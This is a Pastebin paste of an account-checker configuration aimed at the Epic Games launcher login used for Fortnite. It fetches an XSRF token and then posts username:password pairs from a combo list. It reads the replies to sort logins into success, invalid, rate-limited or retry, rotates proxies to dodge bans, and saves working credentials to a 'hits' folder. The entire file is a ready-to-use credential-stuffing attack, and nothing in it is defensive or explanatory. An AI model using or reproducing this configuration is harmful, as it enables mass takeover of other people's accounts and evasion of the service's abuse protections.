Guest User

Untitled

a guest
Apr 27th, 2018
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.84 KB | None | 0 0
  1. [General]
  2. UseProxy = True
  3. UseGlobalKeywords = True
  4. DefaultTimeout = 10
  5. UnbanAllProxiesWhenAllBannedAfter = 3
  6. HitsFolderName = Fortnite folder hits
  7.  
  8. [Stage-1]
  9. Variable-1 = $Link = "https://accounts.launcher-website-prod07.ol.epicgames.com/login/doLauncherLogin"
  10. Variable-2 = $Head = "Host: accounts.launcher-website-prod07.ol.epicgames.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) EpicGamesLauncher/7.4.0-3892210+++Portal+Release-Live UnrealEngine/4.18.0-3892210+++Portal+Release-Live Safari/537.36\nReferer: https://accounts.launcher-website-prod07.ol.epicgames.com//login/launcher?redirectUrl=https%3A%2F%2Faccounts.launcher-website-prod07.ol.epicgames.com%2Flogin%2FshowPleaseWait%3Fclient_id%3D24a1bff3f90749efbfcbc576c626a282%26rememberEmail%3Dfalse&client_id=24a1bff3f90749efbfcbc576c626a282&isLauncher=true"
  11. Variable-3 = $Token1 = findtagval($Stage1ResponseSource#,"name=chr(double quotes)X-XSRF-TOKENchr(double quotes) value=chr(double quotes)","chr(double quotes)")
  12. Variable-4 = $LenToken = len($Token1#) >= 0
  13. Condition = Any
  14. Link = $Link#
  15. isFTP = False
  16. HTTPVersion = 1.1
  17. FollowRedirect = False
  18. HTTPRequestMethod = GET
  19. Headers = $Head#
  20.  
  21. [Stage-2]
  22. Variable-1 = $Link2 = "https://accounts.launcher-website-prod07.ol.epicgames.com/login/doLauncherLogin"
  23. Variable-2 = $Head2 = "Host: accounts.launcher-website-prod07.ol.epicgames.com\nProxy-Connection: keep-alive\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) EpicGamesLauncher/7.4.0-3892210+++Portal+Release-Live UnrealEngine/4.18.0-3892210+++Portal+Release-Live Safari/537.36\nReferer: https://accounts.launcher-website-prod07.ol.epicgames.com//login/launcher?redirectUrl=https%3A%2F%2Faccounts.launcher-website-prod07.ol.epicgames.com%2Flogin%2FshowPleaseWait%3Fclient_id%3D24a1bff3f90749efbfcbc576c626a282%26rememberEmail%3Dfalse&client_id=24a1bff3f90749efbfcbc576c626a282&isLauncher=true"
  24. Variable-3 = $PostData = combinetext("X-XSRF-TOKEN=",$Token1#,"&X-XSRF-URI=%2Flogin%2FdoLauncherLogin&fromForm=yes&authType=&linkExtAuth=&epic_username=",$ComboUsername#,"&password=",$ComboPassword#,"&rememberMe=YES")
  25. Variable-4 = $FailKey = IndexOf($Stage2ResponseSource#,">Sorry the credentials you are using are invalid.<")
  26. Variable-5 = $FailKey2 = IndexOf($Stage2ResponseSource#,">Please reset your password to proceed with login.<")
  27. Variable-6 = $FailCondition = $FailKey# >= 0 || $FailKey2# >= 0
  28. Variable-7 = $BanKey = IndexOf($Stage2ResponseSource#,">Sorry, you are visiting our service too frequent, please try again later.<")
  29. Variable-8 = $BanKey2 = IndexOf($Stage2ResponseHeader#,"Set-Cookie: EPIC_SSO_SESSION_INSTANCE")
  30. Variable-9 = $BanKey3 = IndexOf($Stage2ResponseSource#,">Due to United States trade restrictionschr(Comma) we are unable to permit account login from Cubachr(Comma) Iranchr(Comma) North Koreachr(Comma) Sudanchr(Comma) or Syria at this time.<")
  31. Variable-10 = $BanCondition1 = $BanKey# >= 0 || $BanKey2# < 0 || $BanKey3# >= 0
  32. Variable-11 = $RetryKey = IndexOf($Stage2ResponseSource#,">Sorrychr(Comma) it appears that you have tried to submit the form twice. Please click only once.</")
  33. Variable-12 = $RetryCondition = $RetryKey# >= 0
  34. Variable-13 = $SuccessKey = IndexOf($Stage2ResponseSource#,"chr(double quotes)redirectURLchr(double quotes):chr(double quotes)/chr(double quotes)chr(Comma)chr(double quotes)")
  35. Variable-14 = $SuccessCondition = $SuccessKey# >= 0
  36. Variable-15 = $SaveFormat = combinetext($ComboUsername#,":",$ComboPassword#)
  37. Condition = $LenToken#
  38. Link = $Link2#
  39. isFTP = False
  40. HTTPVersion = 1.1
  41. FollowRedirect = False
  42. HTTPRequestMethod = POST
  43. Headers = $Head2#
  44. PostContent = $PostData#
  45. Retry-Condition = $RetryCondition#
  46. Success-Condition = $SuccessCondition#
  47. Failure-Condition = $FailCondition#
  48. Ban-Condition = $BanCondition1#
Add Comment
Please, Sign In to add comment